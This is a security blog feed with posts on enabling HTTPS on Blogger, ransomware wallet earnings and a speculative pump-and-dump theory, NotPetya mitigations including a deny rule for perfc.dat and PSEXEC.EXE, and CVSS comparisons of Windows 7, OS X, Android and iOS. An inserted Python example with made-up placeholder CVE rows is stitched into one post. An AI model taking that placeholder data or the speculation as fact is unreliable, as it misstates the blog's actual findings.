Morgan's Security Blog, by Morgan Storey (http://www.blogger.com/profile/10406049887224934659); feed last updated 2018-11-01.<br /><br /><b>HTTP is dead, long live HTTPS</b> (published 2018-03-06)<br /><br />"FTP is deprecated, HTTP is deprecated, at least it should be now that we have secure replacements"<br /><br />I'm really not sure where I read that quote; one of the traps of being in the industry so long. It might have been on a security mailing list back in the early noughties. I remember vehemently nodding in agreement... I've been sad for years that my own site was still not running SSL/TLS. I've endeavoured a number of times to get it onto HTTPS, but I am cheap, and I use Blogger's free service for my domain ("Blogger for your domain"), so HTTPS wasn't available.<br />Well, it is now, and I thought I'd do a quick how-to for those who also use Blogger.<br /><br />It is really simple, like Blogger has been for all those years, but it looks to be a beta feature (how long did Google stay in beta for...), so you need to visit https://draft.blogger.com. If you are already logged in to Blogger, you'll be logged in there too.<br /><br />Now click on Settings and scroll down to the HTTPS section. Change the first drop-down to "Yes".<br />Now wait about 20 minutes while Google generates a <a href="https://letsencrypt.org/">https://letsencrypt.org</a> certificate for you and applies it to your site. Come back to this section and change the HTTPS redirect to "Yes" as well. 
And if, like me, you have multiple blogs, go through each and change them all the same way.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-cEp6ox9WBAU/Wp4D8i4e9KI/AAAAAAAAgvM/-wYRdgDrhAEyDDOm-sW5puIHSKFu6icugCLcBGAs/s1600/SSL-Blogger.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="342" data-original-width="745" height="180" src="https://4.bp.blogspot.com/-cEp6ox9WBAU/Wp4D8i4e9KI/AAAAAAAAgvM/-wYRdgDrhAEyDDOm-sW5puIHSKFu6icugCLcBGAs/s400/SSL-Blogger.png" width="400" /></a></div><br />Obviously not a super technical post this time, but it is good to see even free (as in beer) services get security features of sorts.<br />Of course, if you have any other kind of hosting, get a Let's Encrypt cert and use it; the future is encrypted.<br /><br /><b>Ransomware to make money?</b> (published 2017-06-28)<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-TYK6Bujjqck/WVTlw6zBteI/AAAAAAAAcHM/3wlVfdp3w0Q9oHOipaqoj5A9bVm4XSTMACLcBGAs/s1600/1rpe1v.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="500" data-original-width="889" height="179" src="https://4.bp.blogspot.com/-TYK6Bujjqck/WVTlw6zBteI/AAAAAAAAcHM/3wlVfdp3w0Q9oHOipaqoj5A9bVm4XSTMACLcBGAs/s320/1rpe1v.jpg" width="320" /></a></div><br />Ransomware can be used to make money. No, hear me out. Ransomware as a vector to make money... 
no, it is not what you think.<br />So the latest ransomware is doing the rounds after the horror that was WannaCry: we now have <strike><a href="https://www.bleepingcomputer.com/news/security/petya-ransomware-skips-the-files-and-encrypts-your-hard-drive-instead/">Petya</a> (sorry, this went active months ago),</strike> <a href="https://www.itnews.com.au/news/what-you-need-to-know-about-the-petya-notpetya-ransomware-466707">NotPetya</a> and <a href="https://www.digitalxraid.com/goldeneye-ransomware/">GoldenEye</a> all going active overnight. Petya has been around a while, but the new ones use the same vulnerability WannaCry did (EternalBlue), plus they now steal local credentials and re-use them to infect PCs across the network and the world that use the same credentials, regardless of their patch level. These viruses have been seen on everything from <a href="https://twitter.com/NewsReport365/status/879712029698912257/photo/1">point-of-sale systems in Ukraine</a> to <a href="http://www.abc.net.au/news/2017-06-28/cadbury-chocolate-factory-targeted-in-ransomware-attack/8658222">chocolate factories</a> (seriously, chocolate; do beer next and watch Australians find you and tear you limb from limb).<br /><br />Anyway, ransomware typically holds your files to ransom by encrypting them with a key only the attackers know. They then demand payment in the somewhat untraceable cryptocurrency Bitcoin (BTC). Bitcoin can be traded on online markets for real money. The only issue is, they never get much. 
You can actually tell by looking at the digital wallets connected to the ransomware (amounts as of 28/07):<br /><br /><a href="https://bitref.com/18P63yUwiDMJgKmQ8z6veLs84A67vSScEk">Petya (original from March)</a>: 0.0002 BTC, US$0.50 (FAIL)<br /><a href="https://bitref.com/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX">NotPetya</a>: 3.39 BTC, ~US$9,000<br /><a href="https://bitref.com/17xV74Hp2zNR74yG3AJvPpNMchPJHm2iUo">GoldenEye</a>: 0 BTC, US$0 (early days yet, and maybe the same wallet as NotPetya)<br />WannaCry had loads of wallets: the <a href="https://bitref.com/12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw">first one</a> 17.5 BTC, ~US$45,000; the <a href="https://bitref.com/13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94">second one</a> 19.75 BTC, ~US$50,000; the <a href="https://bitref.com/115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn">third one</a> 14.4 BTC, ~US$36,000. That is around 150,000 in total earnings. Thanks to <a href="https://twitter.com/actual_ransom">https://twitter.com/actual_ransom</a>.<br /><br />So why do they do this? They don't actually make an amount equal to the development time or the disruption they cause. I've thought about this a lot. Surely there are better ways to make money. One virus (<a href="http://www.abc.net.au/news/2017-05-18/adylkuzz-cyberattack-could-be-far-worse-than-wannacry:-expert/8537502">Adylkuzz</a>) was recently found that also used the same vulnerability WannaCry did. However, Adylkuzz sat silently on the PC it infected, slowly infecting others... and mining a different cryptocurrency called Monero. Now that is a much smarter long-term money maker.<br />Proofpoint have a good breakdown of Adylkuzz <a href="https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar">here</a>, and as of the 15th of May, likely only a few weeks into their virus mining cryptocurrency, they had around US$50,000. This is important, as mining cryptocurrency takes time. 
Sorry, I can't link directly to the wallets, as Monero doesn't work like Bitcoin in this regard. They seem to be using lots of Monero wallets too, so they are likely making a lot more.<br /><br />I thought this mining by malware was an interesting method; though it isn't making them millionaires, it is still a slow, steady source of money.<br /><br />The Bitcoin wallets used for the ransomware don't seem to make much, not for the effort put in to code and distribute the malware. No, the bad guys are performing, I think, a writ-large pump and dump scheme.<br />Bitcoin has gone from around US$500 a year ago to US$2500 as of writing this. It is slated to get to US$5000 by the end of the year. In fact, if you look at the spikes, they have almost always coincided with ransomware releases; some spikes have come before the malware hit, perhaps indicating a buying frenzy by knowledgeable parties.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-Eolrt08JB2U/WVMoazHwXEI/AAAAAAAAcFc/LybxZ-HWufMoIrhvcmmI8qFOX4NuwDFxgCLcBGAs/s1600/CoinDesk.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="556" data-original-width="903" height="197" src="https://2.bp.blogspot.com/-Eolrt08JB2U/WVMoazHwXEI/AAAAAAAAcFc/LybxZ-HWufMoIrhvcmmI8qFOX4NuwDFxgCLcBGAs/s320/CoinDesk.png" width="320" /></a></div><div style="text-align: center;"><span style="font-size: xx-small;"><i>Care of <a href="http://www.coindesk.com/price/">Coindesk</a></i></span></div><br />Combine this with some companies speculatively buying Bitcoin in case they get hit by ransomware (as reported on the <a href="https://risky.biz/">Risky Business</a> podcast), and other people buying simply because the value is increasing, and you have yourself a massive criminal-led pump and dump scam.<br />The criminals probably bought and mined Bitcoin years ago, and are sitting on it. 
They then pump the demand, and thus the price, up by doing these virus releases, selling them as ransomware-as-a-service to unsuspecting clients... then the price rises and rises... then they sell out all their Bitcoin. The market crashes... but they have millions. Better yet, their Bitcoin wallets are not in any way related to the ransomware transactions, so it becomes difficult to catch them, on top of the usual untraceable nature of Bitcoin transactions.<br /><br />So there you have it: don't play into their game... maybe, or if you do, jump out before the bad guys dump and kill the market. Good luck with that.<br /><br />Oh, and protect yourself from this and all other ransomware by doing backups, not opening files from people you don't know, removing admin rights, making the admin password unique per machine, and maybe even rolling application whitelisting into your environment.<br /><br />In this particular instance:<br /><ul><li><a href="https://twitter.com/mrjefftang/status/879781672794939397">Patch</a> Windows XP and later against <a href="https://technet.microsoft.com/en-us/library/security/ms17-010.aspx">MS17-010</a>.</li><li>Create the file c:\windows\perfc as per <a href="https://twitter.com/threatintel/status/879821695292276736">this</a>.</li><li>The <a href="https://www.microsoft.com/en-us/download/details.aspx?id=46899">LAPS</a> tool is free from Microsoft and should be investigated and used to ensure unique admin passwords on all domain-joined computers.</li><li>Add perfc.dat and PSEXEC.EXE to your application whitelisting as denied, as per <a href="https://twitter.com/HackingDave/status/879779361364357121">https://twitter.com/HackingDave/status/879779361364357121</a>.</li></ul><br /><b>2015 Vulnerabilities - Android VS IOS (iPhone OS)</b> (published 2016-01-16)<br /><br />This is the second post, following on from <a href="http://security.morganstorey.com/2016/01/2015-vulnerabilities-windows7-vs-macosx.html">http://security.morganstorey.com/2016/01/2015-vulnerabilities-windows7-vs-macosx.html</a><br /><br />I was sent this interesting article: <a href="http://venturebeat.com/2015/12/31/software-with-the-most-vulnerabilities-in-2015-mac-os-x-ios-and-flash/">http://venturebeat.com/2015/12/31/software-with-the-most-vulnerabilities-in-2015-mac-os-x-ios-and-flash/</a><br /><br />So I hate Apple, but in the last analysis I did I found that OSX wasn't actually that bad compared to Microsoft's most popular OS at the moment, Windows 7; I would have to say on par. Go to the link at the top to read that one. This time I am similarly analysing <a href="http://www.cvedetails.com/vulnerability-list/vendor_id-1224/product_id-19997/year-2015/Google-Android.html">Google's Android</a> and <a href="http://www.cvedetails.com/vulnerability-list/vendor_id-49/product_id-15556/year-2015/Apple-Iphone-Os.html">Apple's iPhone OS (IOS)</a>.<br />Now, to preface this, I am almost an Android fanboi: I have Android tablets (4 at last count, 3 from dx.com that all died), and although my first smartphone was Symbian, all since have been Android. My kids do have iPads and my wife does have an iPhone, though this is more for the apps available. There are things on both platforms that I wish the other would do, but Android is far and away more flexible. Like last time... don't get me started on my Apple-hate.<br /><br />Now onto the Android/IOS analysis. As I started with MS last time, I'll start with Android this time.<br /><br /><a href="http://www.cvedetails.com/vulnerability-list/vendor_id-1224/product_id-19997/year-2015/Google-Android.html">Google's Android</a> (as opposed to the Motorola version that is listed at CVEDetails) had 130 vulnerabilities in 2015, with an average score across those vulnerabilities of 8.37 (seems a bit high); the standard deviation was 2.23. 
If we then round all the scores (down if they are .4 and below, up if they are .5 and above) we get the below:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-6eq4rd8kGx8/Vph2VclzWiI/AAAAAAAAT-Q/TKquTwZgFX4/s1600/Andorid2015.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="http://3.bp.blogspot.com/-6eq4rd8kGx8/Vph2VclzWiI/AAAAAAAAT-Q/TKquTwZgFX4/s320/Andorid2015.png" width="320" /></a></div>This shows there are an awful lot of vulnerabilities ranked at the ominous CVSS score of 10. Not many of these are going to be from third-party vendors, as mobile OSs don't really allow third-party code to hook into the OS the way desktop OSs do.<br />But I did find the almost obligatory Adobe Flash vulnerabilities in there. 21 of the 61 CVSS 10s were Flash; good thing Google dropped it from their 4.1 (KitKat) release of the OS... an OS released <a href="http://www.pcadvisor.co.uk/review/operating-systems-software/android-41-jelly-bean-review-3367078/">4 and a half years ago</a>. So I don't think these should be included. That still leaves an awful lot of CVSS score 10s; let's look at some.<br /><br />In case you didn't know, this is the decade where security researchers learned some marketing and started to brand their discoveries with cool names and logos, like <a href="http://heartbleed.com/">Heartbleed</a>. Well, <a href="http://www.smh.com.au/it-pro/security-it/scary-android-stagefright-bug-affects-14-billion-20151006-gk23kt.html">Stagefright</a> was a bug of this ilk that was actually a big deal on Android. 
Patched no less than 38 times, of these 49 <br /><br />With words like libstagefright (where the bug got its name), MPEG4Extractor, Skia, Sonivox and mediaserver, these are all related to Stagefright. In fact, of the CVSS 10 bugs remaining after Adobe and Stagefright there seems to be only one: <b>CVE-2015-1474</b>.<br />Here are two examples of obscurely described but Stagefright-related bugs:<br /><br /><b>CVE-2015-6609</b><br /><i>libutils in Android before 5.1.1 LMY48X and 6.0 before 2015-11-01 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted audio file, aka internal bug 22953624.</i><br /><br /><b>CVE-2015-3836</b><br /><i>The Parse_wave function in arm-wt-22k/lib_src/eas_mdls.c in the Sonivox DLS-to-EAS converter in Android before 5.1.1 LMY48I does not reject a negative value for a certain size field, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow) via crafted XMF data, aka internal bug 21132860.</i><br /><br />Interestingly, three CVE-2014s (7915, 7916 and 7917) exist on this list, all related to Stagefright. I believe these CVE ids were allocated prior to the bugs' disclosure.<br /><br />So the only non-Adobe, non-Stagefright bug was:<br /><b>CVE-2015-1474</b><br /><i>Multiple integer overflows in the GraphicBuffer::unflatten function in platform/frameworks/native/libs/ui/GraphicBuffer.cpp in Android through 5.0 allow attackers to gain privileges or cause a denial of service (memory corruption) via vectors that trigger a large number of (1) file descriptors or (2) integer values.</i><br />A pretty nasty one: it allows a malicious app to escalate its privileges via the graphic buffer, though not remote exploitation. Essentially, if a user installs a dodgy app they could give a bad guy access to more than they should.<br /><br />Pretty sure all those Adobe bugs shouldn't be in there, to be fair. 
And they probably should have fixed the Stagefright bug in one go, but I guess it was a pervasive library, hence all the issues found and fixed.<br />Stagefright was pretty bad. It essentially meant that with the right media file (audio on a webpage, for example, or the proof-of-concept <a href="http://www.enterprise-security-today.com/news/Android-Exploit-Released-in-the-Wild/story.xhtml?story_id=102009XSDJEO">MMS attachment</a>), it could get your phone to run a command. So it is remote code execution, the ultimate vulnerability for any OS. But it was specific: you needed to know the app the user was opening your media file in, to be sure it used the library. I think it does deserve the CVSS score of 10; not sure about the Adobe ones though, seeing as most Androids don't run Flash anymore.<br /><br />******************************************<br />On to iPhone OS (IOS)<br /><br /><a href="http://www.cvedetails.com/vulnerability-list/vendor_id-49/product_id-15556/year-2015/Apple-Iphone-Os.html">IOS</a> had a whopping 375 vulnerabilities last year, with a much lower average than Android's at 6.13 (versus Android's 8.37). Its standard deviation was also smaller, at 1.82. This is probably due to the 61 CVSS 10s that Android had. Let's have a look at the graph:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/--Xnx1Jm91ck/Vpiov7JJ-FI/AAAAAAAAT-g/E8pNu3Upl7k/s1600/IOS2015.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="164" src="http://2.bp.blogspot.com/--Xnx1Jm91ck/Vpiov7JJ-FI/AAAAAAAAT-g/E8pNu3Upl7k/s320/IOS2015.png" width="320" /></a></div><div class="separator" style="clear: both; text-align: left;">Interestingly, there are a tonne of CVSS 7s there; a lot of those were a vulnerability in WebKit (Apple Safari) that allowed a remote attacker to crash the app with a specially crafted website. 
I am sure this probably allows the attacker to run code too, so it should probably be rated higher... Most denial-of-service bugs, if done right, end in compromise, but anyway.<br /><br />I'll have a look at some of the more interesting CVSS 10 rated vulnerabilities.</div><div class="separator" style="clear: both; text-align: left;"><br /><b>CVE-2015-6988</b></div><div class="separator" style="clear: both; text-align: left;"><i>The kernel in Apple iOS before 9.1 and OS X before 10.11.1 does not initialize an unspecified data structure, which allows remote attackers to execute arbitrary code via vectors involving an unknown network-connectivity requirement.</i></div>This one looks particularly nasty; it also affected OSX, and I mentioned it in the other post. Definitely worthy of its 10 score. On a mobile this could be very bad if the "unknown network-connectivity" included something sent over, say, the GSM cellular network.<br /><br /><b>CVE-2014-4495</b><br /><i>The kernel in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 does not enforce the read-only attribute of a shared memory segment during use of a custom cache mode, which allows attackers to bypass intended access restrictions via a crafted app.</i><br />This one I didn't mention in the other post, but it isn't that bad. It essentially allows an application already on the phone or Mac to read memory it shouldn't be able to; this could allow that app to escalate permissions or disable some other security measure. I'd give this a solid 9, but 10 seems high.<br /><br /><b>CVE-2014-4480</b><br /><i>Directory traversal vulnerability in afc in AppleFileConduit in Apple iOS before 8.1.3 and Apple TV before 7.0.3 allows attackers to access unintended filesystem locations by creating a symlink.</i><br />This one seems to be IOS/Apple TV only, which is interesting. Accessing locations just by creating a symlink is pretty cool. Not remotely exploitable, but it could help out a bad guy already on a system. 
Again, I don't think it is a 9; perhaps marked too harshly.<br /><br /><b>Conclusion</b><br />As with the other post, even though IOS has more bugs than Android, it isn't the number of bugs that matters so much as the type and quality. Android has a higher average and a lot more rated 10s; taking all this into account it is a pretty even match.<br />Yes, Safari is insecure, Stagefright was a big stuff-up, and Flash and Reader are terrible, but the OSs themselves seem to be pretty much on par.<br /><br />Thanks to CVEdetails for their site and access to the list of vulnerabilities. The compiled spreadsheet is <a href="https://drive.google.com/file/d/0B3nPlpqRXD2oQ2dHVlJ2aUZUQlU/view?usp=sharing">here</a>, under fair use.<br /><br /><b>2015 Vulnerabilities - Windows7 VS MacOSX</b> (published 2016-01-15)<br /><br />I was sent this interesting article: <a href="http://venturebeat.com/2015/12/31/software-with-the-most-vulnerabilities-in-2015-mac-os-x-ios-and-flash/">http://venturebeat.com/2015/12/31/software-with-the-most-vulnerabilities-in-2015-mac-os-x-ios-and-flash/</a><br /><br />Yes, it does appeal to an existing bias I have: APPLE BAD, everything else (except Adobe) good. I really hate Apple, but don't get me started.<br /><br />I had a look at this article and liked it at the outset, but thinking about it I don't agree with it for a few reasons. There is likely a lot of crossover between OSX and iPhone OS, and between the AIR SDK and AIR itself (it is odd that they list the AIR SDK &amp; Compiler separately).<br />There is also the issue of simply counting vulnerabilities as a measure of badness. 
One vulnerability doesn't equal another: if one of those vulnerabilities allows a bad guy to remotely take control of your computer and the other simply allows them to crash your browser, then the first is much worse.<br /><br />So I thought I would do a more detailed analysis to see what is up and maybe confirm my conviction that Apple is terrible.<br /><br />The <a href="http://www.cvedetails.com/">CVEdetails</a> site gives each vulnerability a score (CVSS), from 0 being a minor or non-existent issue to 10 being a critical issue. I decided to show a different side of that article, one that weights the scores rather than the raw counts and thus gives us the OS with the worse security score. I will focus on OSX and Windows 7 to narrow the field; I'll do Android and iPhone OS in the next blog post.<br /><br />Microsoft had 147 vulnerabilities last year all up for <a href="http://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-17153/year-2015/Microsoft-Windows-7.html">Windows 7</a>, with an average score across those vulnerabilities of 6.84. 
If we then round all the scores (down if they are .4 and below, up if they are .5 and above) we get the below:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-YI0c745b3wM/VpXbs0_2C_I/AAAAAAAAT8Q/PyzazUE59RQ/s1600/Win7-2015.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="http://4.bp.blogspot.com/-YI0c745b3wM/VpXbs0_2C_I/AAAAAAAAT8Q/PyzazUE59RQ/s320/Win7-2015.png" width="320" /></a></div><br />Let's look at the vulnerabilities that scored 10.<br /><br /><b>CVE-2015-0014</b><br /><i>Buffer overflow in the Telnet service in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows Telnet Service Buffer Overflow Vulnerability."</i><br />An interesting vulnerability, but not many people should be running Telnet on their Windows 7 PC, let alone exposing it to the internet.<br /><br /><b>CVE-2015-1635</b><br />Was a bad one that allowed you to crash a web server, though the IIS on Windows 7 doesn't run as a <a href="https://www.iis.net/learn/extensions/introduction-to-iis-express/iis-75-express-readme">service</a> and is <a href="https://msdn.microsoft.com/en-us/library/cc268241.aspx">connection limited</a>, as Windows XP's and Windows Vista's IIS were.<br /><br /><b>CVE-2015-2373</b><br />Essentially allows an attacker to execute code on your machine via a vulnerability in Remote Desktop. It is not likely that this is enabled through your router, but it is an issue for a malicious insider, as it is enabled by default to some extent in corporate environments.<br /><br />I don't think these vulnerabilities should all be 10 (say 9.x?). Yes, they allow a remote attacker to take control, but they require a kind of perfect storm. 
They require the Windows 7 machine to have these services enabled (Telnet and IIS are not installed by default; RDP is installed but disabled), and if the attacker is on the internet these also need to be open on the victim's router/firewall, or the attack needs to be chained with an attack on the UPnP NAT mapping that some home routers do.<br /><br />****************************************<br /><br />Now let's look at Apple's MacOSX.<br /><br /><a href="http://www.cvedetails.com/vulnerability-list/vendor_id-49/product_id-156/year-2015/Apple-Mac-Os-X.html">OSX</a> had 384 vulnerabilities in 2015, with a lower average than Microsoft at 6.76. This is likely due to there being more vulnerabilities reported. It could also be that Microsoft seemingly score and report their own vulnerabilities and thus are harsher on themselves. There is also the issue that a lot of the OSX vulnerabilities are due to included open-source software, and thus these libraries get reported by their maintainers (e.g. Apache, PHP etc.). Some of the higher-rated vulns I noticed were Apple-only, and only reported on Apple's support pages or lists.<br />If we do the same breakdown as before we get the below:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-dvkFF7EYdVQ/VpbciC-NPgI/AAAAAAAAT9Q/30YTzNonyxo/s1600/OSX.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="http://3.bp.blogspot.com/-dvkFF7EYdVQ/VpbciC-NPgI/AAAAAAAAT9Q/30YTzNonyxo/s320/OSX.png" width="320" /></a></div>Looking at that, we can see there are simply so many more 7, 4 and 5 rated vulnerabilities, which is what brought the average down. I had a look at the standard deviations using the Excel STDEV (sample) and STDEVP (full population) functions, and they are pretty close. 
MS at 2.43 and OSX at 2.04.<br /><br />Having a look at a sample of the CVSS 10s, there is a bit of a difference.<br /><br /><b>CVE-2015-7071</b><br /><i>"The File Bookmark component in Apple OS X before 10.11.2 allows attackers to bypass a sandbox protection mechanism for app scoped bookmarks via a crafted pathname."</i><br />This one sounds worse than any of the vulnerabilities that scored 10 on Windows, essentially allowing an attacker to bypass protections via a bookmark; bookmarks can be created by running some JavaScript on a site that the user visits. Pretty bad.<br /><br /><b>CVE-2015-6988</b><br /><i>The kernel in Apple iOS before 9.1 and OS X before 10.11.1 does not initialize an unspecified data structure, which allows remote attackers to execute arbitrary code via vectors involving an unknown network-connectivity requirement.</i><br />OK, this one is pretty bad too, allowing an attacker to execute code remotely.<br /><br /><b>CVE-2015-5887</b><br />This one is a TLS/SSL bug, probably a flow-on from SSL bugs found in 2015 in open-source libraries and in closed-source ones, such as the Windows bugs CVE-2015-6112 and CVE-2015-1637. Though I note both these Windows bugs had much lower CVSS scores, of 5.8 and 4.3 respectively.<br /><br /><b>CVE-2015-1131</b><br />A bug in an Apple font library, essentially allowing remote code execution if the font is called in a specific way, say from a webpage. 
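The breakdown used in this post and in the Android/IOS one (round each CVSS score half-up, bucket the rounded scores as the bar charts do, compare Excel's STDEV with STDEVP, and set aside the third-party Adobe entries) as an added worked example in Python. This is not the blog's spreadsheet; the records are constructed sample rows in the shape of a CVE Details export, with placeholder ids and made-up scores, not the real 2015 lists.

```python
"""CVSS breakdown in the style of the 2015 Windows 7 vs OS X and Android vs IOS posts.

Added example, not the blog's own spreadsheet. The records below are constructed
sample rows (placeholder ids, made-up scores and summaries), not the real 2015 data.
"""
from collections import Counter
from decimal import Decimal, ROUND_HALF_UP
from typing import NamedTuple
import math
import re


class Record(NamedTuple):
    cve: str      # identifier as it would appear in the export
    cvss: float   # CVSS base score, 0.0 to 10.0, one decimal
    summary: str  # NVD-style description


# Constructed sample rows (placeholder ids, not real CVEs).
SAMPLE = [
    Record("CVE-0000-0001", 10.0, "Buffer overflow in an optional remote access service allows remote code execution."),
    Record("CVE-0000-0002", 10.0, "Adobe Flash Player allows remote code execution via a crafted SWF file."),
    Record("CVE-0000-0003", 10.0, "Adobe Reader and Acrobat allow attackers to bypass JavaScript API restrictions."),
    Record("CVE-0000-0004", 7.5, "WebKit allows remote attackers to crash the browser via a crafted web site."),
    Record("CVE-0000-0005", 6.5, "Kernel driver does not validate a size field, allowing local privilege escalation."),
    Record("CVE-0000-0006", 4.3, "TLS implementation accepts a weak cipher suite during negotiation."),
    Record("CVE-0000-0007", 5.0, "Shared memory segment read-only attribute is not enforced for a crafted app."),
    Record("CVE-0000-0008", 9.3, "Font parser allows remote code execution via a crafted font on a web page."),
]

# Third-party products the posts argue should not count against the OS vendor.
THIRD_PARTY = re.compile(r"\bAdobe\b|\bFlash\b|\bAcrobat\b")


def round_score(score: float) -> int:
    """Round the way the posts do: .4 and below down, .5 and above up.

    Python's built-in round() is banker's rounding (round(6.5) == 6), which would
    drop half-scores such as 6.5 into the wrong bucket, so use Decimal instead.
    """
    return int(Decimal(str(score)).quantize(Decimal("1"), rounding=ROUND_HALF_UP))


def mean(scores):
    return sum(scores) / len(scores)


def stdev(scores, population=False):
    """Excel STDEV (sample, divides by n-1) or STDEVP (population, divides by n)."""
    m = mean(scores)
    squares = sum((s - m) ** 2 for s in scores)
    return math.sqrt(squares / (len(scores) if population else len(scores) - 1))


def histogram(scores):
    """Number of vulnerabilities per rounded score, 0..10, i.e. the bar charts in the posts."""
    counts = Counter(round_score(s) for s in scores)
    return {bucket: counts.get(bucket, 0) for bucket in range(11)}


def split_third_party(records):
    """Separate OS entries from ones whose summary names Adobe Flash/Reader/Acrobat."""
    own = [r for r in records if not THIRD_PARTY.search(r.summary)]
    third = [r for r in records if THIRD_PARTY.search(r.summary)]
    return own, third


def summarise(records, population=False):
    """The figures the posts compare for one OS, plus the CVSS 10 count with Adobe removed."""
    own, third = split_third_party(records)
    scores = [r.cvss for r in records]
    own_scores = [r.cvss for r in own]
    return {
        "count": len(records),
        "mean": mean(scores),
        "stdev": stdev(scores, population),
        "histogram": histogram(scores),
        "third_party": len(third),
        "tens_without_third_party": histogram(own_scores)[10] if own_scores else 0,
    }


if __name__ == "__main__":
    result = summarise(SAMPLE)
    print(f"{result['count']} vulns, mean {result['mean']:.2f}, STDEV {result['stdev']:.2f}")
    print("histogram:", {k: v for k, v in result["histogram"].items() if v})
    print(f"CVSS 10s: {result['histogram'][10]} total, "
          f"{result['tens_without_third_party']} once {result['third_party']} Adobe entries are removed")
```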
Similar to the much lower rated CVE-2015-0059 Windows 7 bug.<br /><br />Then there are a few bugs in drivers for Apple hardware: Bluetooth, IOAccelerator (seems to be a RAM disk card not likely found in most Macs), a couple of pretty bad kernel bugs and some HID driver bugs.<br /><br /><u><b>But</b></u> then, looking at the rest of the 10 rated bugs, a pattern emerges. 27 of the CVSS rated 10s are actually ADOBE bugs in Acrobat/PDF Reader... yikes. See the example below:<br /><br /><b>CVE-2015-3074</b><br /><i>Adobe Reader and Acrobat 10.x before 10.1.14 and 11.x before 11.0.11 on Windows and OS X allow attackers to bypass intended restrictions on JavaScript API execution via unspecified vectors, a different vulnerability than CVE-2015-3060, CVE-2015-3061, CVE-2015-3062, CVE-2015-3063, CVE-2015-3064, CVE-2015-3065, CVE-2015-3066, CVE-2015-3067, CVE-2015-3068, CVE-2015-3069, CVE-2015-3071, CVE-2015-3072, and CVE-2015-3073.</i><br /><br />I don't think it is fair that these Adobe bugs are rated 10 for Apple when they aren't even listed on the Windows 7 list, as they are a third-party bug.<br />Some of the other 10 rated bugs also reference OSX's App Store. Apps that install from the App Store install into a permissions-based jail, essentially protecting the rest of the system from the app. The bugs that were found allowed these apps to break out of this jail... But Windows 7 doesn't have this feature for its store apps, so an app installs in whatever context the user is running as (run everything as admin and the app you install can get admin privileges). So really, although this is a bug, it is not as bad as simply not having that protection at all.<br /><br />MS has an app store in Windows 8 and above... 
and for a time it was so <a href="http://www.howtogeek.com/194993/the-windows-store-is-a-cesspool-of-scams-why-doesnt-microsoft-care/">horrible</a> that I would advise against using it for the foreseeable future.<br /><br /><b>Conclusion</b><br /><br />As much as I hate to admit it, MacOSX having more bugs doesn't mean anything; it isn't the number but the quality. MacOS had more, yes, but other than that one bookmark bug a lot of them were actually third-party code or code that was not likely to be exploited. The Windows 7 CVSS 10 bugs weren't that bad either: not too many will have these exposed to the internet, and inside networks all bar the RDP bug will likely not be installed on 99% of machines. I think we would find that if Apple ditched support for natively updating Adobe and other third-party software, their number of bugs would drop dramatically; account for their directly supporting all their hardware and you can account for the disparity in the numbers of bugs.<br />There is more analysis that could be done here too (I will post the spreadsheet I used in the next post). Perhaps MacOSX had more bugs because more were reported, more were actioned, and more were reported publicly to open-source software library mailing lists where they would make their way to the media, and Apple would be red-faced if they didn't jump on patching them. Perhaps MS was scoring their bugs harsher than they needed to, and submitters of the open-source software bugs in MacOSX were scoring their bugs softer due to their bias towards supporting their own code.<br /><br />Security-wise I would say they are actually neck and neck, which is, I suppose, a good place to be for security at large. Not good for Apple-bashers like me, but I will admit when Apple does good things.<br /><br />On to the CVSS scores: I don't think they are doing it right. 
They shouldn't be giving an optional, disabled-by-default service like Telnet, or an obscure and I assume non-loaded driver like the IOAccelerator on Apple, a score of 10. Sure it allowed remote exploitation, but how likely is it? They should probably put these at &lt;9.5; then they are still critical, but this score doesn't black-eye the vendor so much. Next, they really shouldn't include third party software in one listing and not in the other; you can't compare the two this way, it is an (ahem) apples versus oranges issue.Morgannoreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-74393107248475074952015-05-20T20:30:00.000+10:002015-11-25T15:25:37.381+11:00Disrupting the paradigmNot sure if I am quoting here, but be careful when someone says they are disrupting the paradigm; often when you look beneath the veil you will find an issue. The paradigm is usually there for a reason, because it works.<br /><br />I have discussed factorisation of authentication before <a href="http://security.morganstorey.com/2012/11/15-factor-authentication.html">here</a>; this one will be a little more in depth.<br /><br />To reiterate, authentication currently works under a model of factors. Factors are simply classifications of <b>things, in a cumulative manner</b>. Things could be something you know (and preferably keep private), something you have, something you are, somewhere you are. 
